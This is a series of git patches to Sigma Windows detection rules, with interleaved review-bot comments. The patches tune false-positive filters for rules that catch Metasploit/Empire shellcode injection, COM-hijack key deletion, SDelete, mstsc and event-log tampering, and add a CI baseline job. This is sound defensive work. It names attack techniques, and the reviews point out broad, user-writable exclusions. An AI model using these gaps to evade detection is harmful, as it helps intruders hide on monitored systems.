@@ -84,9 +85,9 @@ detection: - '\vs_bootstrapper_' GrantedAccess: '0x1410' filter_chrome: - SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' - SourceImage|endswith: '.tmp\GoogleUpdate.exe' - GrantedAccess: '0x410' + SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' + SourceImage|endswith: '.tmp\GoogleUpdate.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User diff --git a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml index 171a30883..b495e82c8 100644 --- a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml +++ b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml @@ -4,6 +4,7 @@ status: experimental description: Detects shellcode injection by Metasploit's migrate and Empire's psinject author: Bhabesh Raj date: 2022/03/11 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.privilege_escalation 
@@ -13,11 +14,38 @@ logsource: product: windows detection: selection: - GrantedAccess: + GrantedAccess: - '0x147a' - '0x1f3fff' CallTrace|contains: 'UNKNOWN' - condition: selection + filter_dell_folders: + # If dell software is installed we get matches like these + # Example 1: + # SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 2: + # SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 3: + # SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # GrantedAccess: 0x1F3FFF + SourceImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + TargetImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + filter_dell_specifc: + SourceImage: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe + TargetImage: C:\Windows\Explorer.EXE + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + condition: selection and not 1 of filter_* falsepositives: - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well level: high \ No newline at end of file diff --git a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml index 1202cc9f2..7bc952889 100644 --- a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml +++ b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml 
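Review bot: `GrantedAccess: 0x1F3FFF` in both new filters is an unquoted plain scalar, which YAML parses as the integer 2047999 (hex literal), while the selection above compares the same field against the quoted strings `'0x147a'` / `'0x1f3fff'`; depending on the backend the filter may be emitted as a numeric comparison that never matches, so the exclusion would silently do nothing. Quote it in both filters: `GrantedAccess: '0x1F3FFF'`. The name `filter_dell_specifc` is misspelled (`filter_dell_specific`), and the file still ends without a trailing newline.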
@@ -25,7 +25,11 @@ detection:
 - 'C:\Public\'
 - '\AppData\Local\Temp\'
 - '\AppData\Roaming\Temp\'
- condition: selection
+ filter_dell:
+ # Launched by Dell ServiceShell.exe
+ ParentImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe'
+ CommandLine|contains: 'C:\ProgramData\Dell\UpdateService\Temp\'
+ condition: selection and not 1 of filter_*
 fields:
 - ComputerName
 - User
diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml
index 20df29533..9278e5b04 100644
--- a/rules/windows/process_creation/proc_creation_win_mstsc.yml
+++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml
@@ -7,7 +7,7 @@ references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc
 date: 2022/01/07
-modified: 2022/09/20
+modified: 2022/09/21
 logsource:
 category: process_creation
 product: windows
@@ -27,6 +27,7 @@ detection:
 - ' /p'
 filter_mstsc_1:
 ParentImage: 'C:\Windows\System32\lxss\wslhost.exe'
+ CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp'
 condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey*
 falsepositives:
 - Unknown
diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml
index fabb0e86f..fb9250c74 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml
@@ -27,7 +27,8 @@ fields:
 - CommandLine
 - ParentCommandLine
 falsepositives:
- - Unknown
+ - During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section
+ - Other currently unknown cases
 level: high
 tags:
 - attack.discovery
diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
index c6c92af1f..6b6ec4ec7 100644
--- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
+++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
@@ -4,36 +4,41 @@ status: test description: A General detection to trigger for processes removing .*\shell\open\command registry keys. Registry keys that might have been used for COM hijacking activities. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/7 - - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html - - https://docs.microsoft.com/en-us/windows/win32/shell/launch - - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand - - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code + - https://github.com/OTRF/detection-hackathon-apt29/issues/7 + - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html + - https://docs.microsoft.com/en-us/windows/win32/shell/launch + - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand + - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code date: 2020/05/02 -modified: 2022/03/26 +modified: 2022/09/21 logsource: - product: windows - category: registry_delete + product: windows + category: registry_delete detection: - selection: - EventType: 'DeleteKey' - TargetObject|endswith: '\shell\open\command' - filter_svchost: - Image: 'C:\Windows\system32\svchost.exe' - filter_office: - Image|startswith: - - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\' - - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\' - Image|endswith: '\OfficeClickToRun.exe' - filter_integrator: - Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe' - filter_dropbox: - Image|endswith: '\Dropbox.exe' - TargetObject|startswith: 'HKCR\Dropbox.' 
- condition: selection and not 1 of filter_* + selection: + EventType: 'DeleteKey' + TargetObject|endswith: '\shell\open\command' + filter_svchost: + Image: 'C:\Windows\system32\svchost.exe' + filter_office: + Image|startswith: + - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\' + - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\' + Image|endswith: '\OfficeClickToRun.exe' + filter_integrator: + Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe' + filter_dropbox: + Image|endswith: '\Dropbox.exe' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\Dropbox.' + filter_wireshark: + Image|endswith: '\AppData\Local\Temp\Wireshark_uninstaller.exe' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\wireshark-capture-file\' + condition: selection and not 1 of filter_* falsepositives: - - Unknown + - Unknown level: medium tags: - - attack.defense_evasion - - attack.t1112 + - attack.defense_evasion + - attack.t1112 From e4e2177533693dfbe8948d72d164902187900eb1 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:56:58 +0200 Subject: [PATCH 076/120] Update file_delete_win_sysinternals_sdelete_file_deletion.yml --- .../file_delete_win_sysinternals_sdelete_file_deletion.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index 03798c09f..9c04a6701 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml 
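Review bot: `falsepositives` still reads `- Unknown` although the rule now carries named exclusions for Dropbox and the Wireshark uninstaller; list them so triage matches the detection block, e.g. `- Dropbox and the Wireshark uninstaller removing their own \shell\open\command keys`. The Dropbox filter also moves from `TargetObject|startswith: 'HKCR\Dropbox.'` to `TargetObject|contains: '\Dropbox.'`, which matches the substring anywhere in the key path rather than at the hive root; the comment explains the HKCR/HKEY_CLASSES_ROOT motivation, but combined with the directory-unanchored `Image|endswith: '\Dropbox.exe'` this is a noticeably broader exemption than before, so extend the comment to say that widening was accepted deliberately. The same applies to `filter_wireshark`, whose image lives under the user-writable `\AppData\Local\Temp\`.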
@@ -17,12 +17,10 @@ detection:
 - '.AAA'
 - '.ZZZ'
 filter_wireshark:
- # This event occurs when (un)installing wireshark
- TargetFilename: 'C:\Program Files\Wireshark\radius\dictionary.alcatel-lucent.aaa'
+ TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa'
 condition: selection
 falsepositives:
 - Legitime usage of SDelete
- - An FP may occure if the installation directory of wireshark is changed
 level: medium
 tags:
 - attack.defense_evasion
From e987fa6acb9e73e03c46ad905069bd276bf3c008 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 21 Sep 2022 11:57:10 +0200
Subject: [PATCH 077/120] Update file_delete_win_sysinternals_sdelete_file_deletion.yml
---
 .../file_delete_win_sysinternals_sdelete_file_deletion.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml
index 9c04a6701..64ea228a5 100644
--- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml
+++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml
@@ -18,7 +18,7 @@ detection:
 - '.ZZZ'
 filter_wireshark:
 TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa'
- condition: selection
+ condition: selection and not 1 of filter_*
 falsepositives:
 - Legitime usage of SDelete
 level: medium
From a0c3449079acc2e2d460dc2b4af577d1a2daf749 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 21 Sep 2022 11:59:12 +0200
Subject: [PATCH 078/120] Fix typo
---
 rules/windows/network_connection/net_connection_win_python.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
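Review bot: The rationale comment for `filter_wireshark` is dropped together with the false-positive entry, so the new `TargetFilename|endswith` line now carries no explanation of which event it suppresses or why the match was loosened from a full path. Keep a one-line comment above it, `# Written by the Wireshark (un)installer; endswith also covers non-default install directories`, which is what the removed FP entry was documenting. After this hunk `condition: selection` does not reference the filter at all; the next commit in the series (`[PATCH 077/120]`) corrects that, so no further change is needed here.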
diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml
index bc3737dcb..4d50017c2 100644
--- a/rules/windows/network_connection/net_connection_win_python.yml
+++ b/rules/windows/network_connection/net_connection_win_python.yml
@@ -29,7 +29,7 @@ detection:
 CommandLine|contains|all:
 - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py'
 filter_local_communication:
- # This coumd be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances
+ # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances
 DestinationIp: 127.0.0.1
 SourceIp: 127.0.0.1
 condition: selection and not 1 of filter_*
From d9cd98838f6ee552fe5474baec0af8c052575178 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 21 Sep 2022 12:02:15 +0200
Subject: [PATCH 079/120] Add descriptions
---
 .../process_access_win_shellcode_inject_msf_empire.yml | 2 +-
 rules/windows/process_creation/proc_creation_win_mstsc.yml | 4 +++-
 2 files changed, 4 insertions(+), 2 deletions(-)
diff --git a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml
index b495e82c8..d9d77b85b 100644
--- a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml
+++ b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml
@@ -48,4 +48,4 @@ detection:
 condition: selection and not 1 of filter_*
 falsepositives:
 - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well
-level: high
\ No newline at end of file
+level: high
diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml
index 9278e5b04..0fb8cc3ec 100644
--- a/rules/windows/process_creation/proc_creation_win_mstsc.yml
+++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml
@@ -26,11 +26,13 @@ detection:
 - ' /u'
 - ' /p'
 filter_mstsc_1:
+ # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp
 ParentImage: 'C:\Windows\System32\lxss\wslhost.exe'
 CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp'
 condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey*
 falsepositives:
- - Unknown
+ - WSL (Windows Sub System For Linux)
+ - Other currently unknown software
 level: medium
 tags:
 - attack.lateral_movement
From 7dd2af08e7d48609269482794762d9ba92c8e92a Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 21 Sep 2022 12:16:15 +0200
Subject: [PATCH 080/120] Update net_connection_win_python.yml
---
 rules/windows/network_connection/net_connection_win_python.yml | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml
index 4d50017c2..bebc55259 100644
--- a/rules/windows/network_connection/net_connection_win_python.yml
+++ b/rules/windows/network_connection/net_connection_win_python.yml
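Review bot: The new falsepositives entry in `proc_creation_win_mstsc.yml` misspells the product name as `Windows Sub System For Linux`; the product is called Windows Subsystem for Linux, so the line should read `- WSL (Windows Subsystem for Linux)`. The example comment added above `ParentImage` is useful since the filter keys on both the WSL host parent and the `wslg.rdp` path; the `condition` line that consumes `filter_mstsc_*` is unchanged context in this hunk.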
@@ -26,8 +26,7 @@ detection:
 # Related to anaconda opening an instance of Jupyter Notebook
 # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage
 ParentImage: C:\ProgramData\Anaconda3\python.exe
- CommandLine|contains|all:
- - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py'
+ CommandLine|contains: 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py'
 filter_local_communication:
 # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances
 DestinationIp: 127.0.0.1
From 4a741290482e16bc0c02f45361f2bee4a920451d Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 21 Sep 2022 13:12:21 +0200
Subject: [PATCH 081/120] Fix after review
---
 .../image_load/image_load_side_load_antivirus.yml | 10 +++++++---
 .../image_load/image_load_susp_python_image_load.yml | 7 ++++---
 .../proc_creation_win_susp_codepage_lookup.yml | 8 +++++---
 3 files changed, 16 insertions(+), 9 deletions(-)
diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml
index f2198619d..ce7c17e00 100644
--- a/rules/windows/image_load/image_load_side_load_antivirus.yml
+++ b/rules/windows/image_load/image_load_side_load_antivirus.yml
@@ -6,6 +6,7 @@ references:
 - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)
 author: Nasreddine Bencherchali, Wietze Beukema (project and research)
 date: 2022/08/17
+modified: 2022/09/21
 tags:
 - attack.defense_evasion
 - attack.persistence
@@ -19,10 +20,13 @@ detection:
 # Bitdefender
 selection_bitdefender:
 ImageLoaded|endswith: '\log.dll'
- filter_bitdefender:
+ filter_log_dll_bitdefender:
 ImageLoaded|startswith:
 - 'C:\Program Files\Bitdefender Antivirus Free\'
 - 'C:\Program Files (x86)\Bitdefender Antivirus Free\'
+ filter_log_dll_other:
+ - ImageLoaded: 'C:\Program Files\Dell\SARemediation\plugin\log.dll'
+ - ImageLoaded|startswith: 'C:\Program Files\Canon\MyPrinter\'
 # F-Secure
 selection_fsecure:
 ImageLoaded|endswith: '\qrt.dll'
@@ -40,9 +44,9 @@ detection:
 ImageLoaded|startswith:
 - 'C:\Program Files\McAfee\'
 - 'C:\Program Files (x86)\McAfee\'
- condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee)
+ condition: (selection_bitdefender and not 1 of filter_log_dll_*) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee)
 falsepositives:
 - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.
- - Dell SARemediation pulgin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file.
+ - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file.
 - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file
 level: medium
diff --git a/rules/windows/image_load/image_load_susp_python_image_load.yml b/rules/windows/image_load/image_load_susp_python_image_load.yml
index 8ddb710a6..9b071a802 100644
--- a/rules/windows/image_load/image_load_susp_python_image_load.yml
+++ b/rules/windows/image_load/image_load_susp_python_image_load.yml
@@ -3,7 +3,7 @@ id: cbb56d62-4060-40f7-9466-d8aaf3123f83
 description: Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.
 status: experimental
 date: 2020/05/03
-modified: 2021/12/05
+modified: 2022/09/21
 author: Patrick St. John, OTR (Open Threat Research)
 tags:
 - attack.defense_evasion
@@ -23,10 +23,11 @@ detection:
 - Image|startswith:
 - 'C:\Program Files\'
 - 'C:\Program Files (x86)\'
+ - 'C:\ProgramData\Anaconda3\' # Comment out if you don't use Anaconda in your environment
 condition: selection and not filter
 fields:
 - Description
 falsepositives:
- - Legit Py2Exe Binaries
- - Known false positive caused with anaconda installation/update
+ - Legitimate Py2Exe Binaries
+ - Known false positive caused with Python Anaconda
 level: medium
diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml
index fb9250c74..3e7830ad4 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml
@@ -7,7 +7,7 @@ references:
 - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp
 date: 2022/02/21
-modified: 2022/04/21
+modified: 2022/09/21
 logsource:
 category: process_creation
 product: windows
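Review bot: The added `- 'C:\ProgramData\Anaconda3\'` entry excludes every image under that tree from the Py2Exe detection, and unlike the two `Program Files` prefixes beside it, a `C:\ProgramData` subtree does not require administrative rights to write to by default (whether the Anaconda installer tightens the ACL on its own folder depends on the installation and is not visible here). A Py2Exe-bundled binary placed in that folder would therefore no longer be reported, which is a different exposure from excluding an admin-only install directory. If the exclusion is kept, consider pinning it to the specific interpreter images that produced the false positive rather than the whole tree (the Anaconda filter in `net_connection_win_python.yml` earlier in this series uses `C:\ProgramData\Anaconda3\python.exe`), and extend the inline comment to say the folder is user-writable so the weaker anchor is a recorded decision.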
@@ -22,13 +22,15 @@ detection:
 - 'chcp'
 - 'chcp '
 - 'chcp '
- condition: selection
+ filter_anaconda:
+ # This filter will only work with aurora agent enriched data as Sysmon EID 1 and EID 4688 from event log both do not contain GrandparentCommandLine field
+ GrandparentCommandLine|contains: '/c C:\ProgramData\Anaconda3'
+ condition: selection and not 1 of filter_*
 fields:
 - CommandLine
 - ParentCommandLine
 falsepositives:
 - During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section
- - Other currently unknown cases
 level: high
 tags:
 - attack.discovery
From 4f6d4b7c80086967a6286deb3b066c7ab022303f Mon Sep 17 00:00:00 2001
From: phantinuss <79651203+phantinuss@users.noreply.github.com>
Date: Tue, 20 Sep 2022 12:15:04 +0200
Subject: [PATCH 082/120] fix: FP in testing environment
---
 .../registry_set/registry_set_disable_winevt_logging.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml
index 462cceb32..08ad446bf 100644
--- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml
+++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml
@@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3
 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel
 author: frack113, Nasreddine Bencherchali
 date: 2022/07/04
-modified: 2022/09/19
+modified: 2022/09/20
 status: experimental
 references:
 - https://twitter.com/WhichbufferArda/status/1543900539280293889
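Review bot: `filter_anaconda` suppresses a high-level alert on a substring of `GrandparentCommandLine` alone, and a command line is whatever the launching process chose to pass, so the exclusion is not tied to the Anaconda binary it is meant to cover. The falsepositives entry already names `conda.exe` as the launcher; pairing the string with that image, `GrandparentImage|endswith: '\conda.exe'`, would keep the filter from applying outside that context. Whether `GrandparentImage` is populated in the same enriched data as `GrandparentCommandLine` is not visible here, so confirm that before adding it; the new comment already documents the Aurora-only dependency, which is good.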
@@ -28,6 +28,7 @@ detection:
 - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter'
 - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\'
 - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\'
+ - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Runtime\Error\'
 filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later
 Image:
 - ''
From e5e5cdd3b344104960c165337ebe5ce632d08a1d Mon Sep 17 00:00:00 2001
From: phantinuss <79651203+phantinuss@users.noreply.github.com>
Date: Tue, 20 Sep 2022 14:15:18 +0200
Subject: [PATCH 083/120] workflow: update evtx-baseline to v0.7 and add a new test for the data
---
 .github/workflows/sigma-test.yml | 20 +++++++++++++++++++-
 tests/check-baseline-local.sh | 15 +++++++++++++++
 2 files changed, 34 insertions(+), 1 deletion(-)
diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml
index f40ccf5ea..60b6cdc96 100644
--- a/.github/workflows/sigma-test.yml
+++ b/.github/workflows/sigma-test.yml
@@ -13,7 +13,7 @@ on: # yamllint disable-line rule:truthy
 - oscd
 env:
- EVTX_BASELINE_VERSION: v0.6
+ EVTX_BASELINE_VERSION: v0.7
 jobs:
 test-sigma:
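Review bot: The new `Microsoft-Windows-Runtime\Error` channel path is added to an exclusion list with no note of what legitimately toggles its `Enabled` value, so a reader cannot tell whether the entry is safe to keep or was a one-off from the test baseline (the commit subject only says it came from the testing environment). Add an inline comment on the new line, `# Toggled by <process observed in the test baseline, fill in>`, in the way the neighbouring `filter_empty` block documents its Aurora case, so the exclusion can be revisited later. The enclosing filter block starts outside this hunk, so I cannot see which key the list belongs to.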
@@ -132,3 +132,21 @@ jobs:
 ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ > findings.json
 - name: Show findings excluding known FPs
 run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
+ check-baseline-win2022-0-20348-azure:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - name: Download evtx-sigma-checker
+ run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
+ - name: Download and extract Windows 2022 0 20348 Azure baseline
+ run: |
+ wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz
+ tar xzf win2022-0-20348.tgz
+ - name: Remove deprecated rules
+ run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v'
+ - name: Check for Sigma matches in baseline
+ run: |
+ chmod +x evtx-sigma-checker
+ ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ > findings.json
+ - name: Show findings excluding known FPs
+ run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh
index 3c849f52d..b3d966d36 100755
--- a/tests/check-baseline-local.sh
+++ b/tests/check-baseline-local.sh
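Review bot: The archive name passed to `tar` does not match the file just downloaded: the `wget` line fetches `win2022-0-20348-azure.tgz` but the next line runs `tar xzf win2022-0-20348.tgz`, so the step fails on a missing file and the new job never runs the checker against the Azure baseline; it should read `tar xzf win2022-0-20348-azure.tgz`, matching the `--evtx-path win2022-0-20348-azure/` used further down. Separately, the job downloads an executable from a release by tag and runs it after `chmod +x` with no checksum or signature verification; the existing jobs in this workflow appear to follow the same pattern, so if it is tightened it should be done for all of them, for example by comparing against a digest recorded next to `EVTX_BASELINE_VERSION`. `actions/checkout@v2` is also an older major of that action; the rest of the file is not visible here to say whether the other jobs use the same one.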
@@ -146,6 +146,18 @@ OS="Windows 11"
 pids+=($!)
 PID2OS[$!]=$OS
+# Windows 2022.0.20348 Azure
+OS="Windows 2022.0.20348 Azure"
+{
+ wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz
+ tar xzf win2022-0-20348-azure.tgz
+ echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)"
+ ./evtx-sigma-checker --log-source "${SIGMA}"/tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path windows/ > findings-win2022-0-20348-azure.json
+ echo " Finished Checking for Sigma matches in $OS baseline"
+}&
+pids+=($!)
+PID2OS[$!]=$OS
 # Sync with all background jobs
 for pid in ${pids[*]}; do
 echo "===> Waiting for PID $pid / ${PID2OS[$pid]}"
@@ -171,6 +183,9 @@ echo "Windows 2022:"
 echo
 echo "Windows 2022 AD:"
 "${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-ad.json "${SIGMA}"/.github/workflows/known-FPs.csv
+echo
+echo "Windows 2022.0.20348 Azure:"
+"${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-0-20348-azure.json "${SIGMA}"/.github/workflows/known-FPs.csv
 echo
 read -p "Removing temporary directory ${TMP}. Press Enter to continue." -s
From 40e0dfcb292457b784cfe93c1a84d35979dbbfed Mon Sep 17 00:00:00 2001
From: phantinuss <79651203+phantinuss@users.noreply.github.com>
Date: Wed, 21 Sep 2022 11:38:10 +0200
Subject: [PATCH 084/120] chore: add new known FPs
---
 .github/workflows/known-FPs.csv | 11 +++++++----
 tests/check-baseline-local.sh | 4 ++++
 2 files changed, 11 insertions(+), 4 deletions(-)
diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv
index e29877a27..a22dafcd5 100644
--- a/.github/workflows/known-FPs.csv
+++ b/.github/workflows/known-FPs.csv
